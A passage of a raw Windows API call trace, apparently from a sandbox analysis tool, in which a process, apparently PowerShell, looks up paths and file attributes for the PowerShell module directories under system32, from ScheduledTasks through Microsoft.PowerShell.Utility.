ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", lpFilePart=0x0) returned 0x41 [0332.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0332.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0332.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0332.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.123] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0332.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", nBufferLength=0x3f, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0332.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0332.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x3b, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0332.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0332.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", nBufferLength=0x43, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", lpFilePart=0x0) returned 0x42 [0332.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storagebuscache"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0332.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", lpFilePart=0x0) returned 0x36 [0332.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0332.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0332.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x49, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", lpFilePart=0x0) returned 0x48 [0332.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", lpFilePart=0x0) returned 0x36 [0332.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", lpFilePart=0x0) returned 0x3c [0332.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x38, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", lpFilePart=0x0) returned 0x37 [0332.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", nBufferLength=0x38, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea", lpFilePart=0x0) returned 0x37 [0332.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Whea" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\whea"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4b [0332.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x4b, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", lpFilePart=0x0) returned 0x4a [0332.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.129] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0332.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x49, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", lpFilePart=0x0) returned 0x48 [0332.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.129] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch", lpFilePart=0x0) returned 0x40 [0332.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.129] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowssearch"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", lpFilePart=0x0) returned 0x40 [0332.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0332.130] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89ab60 [0332.130] FindNextFileW (in: hFindFile=0x1a89ab60, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, 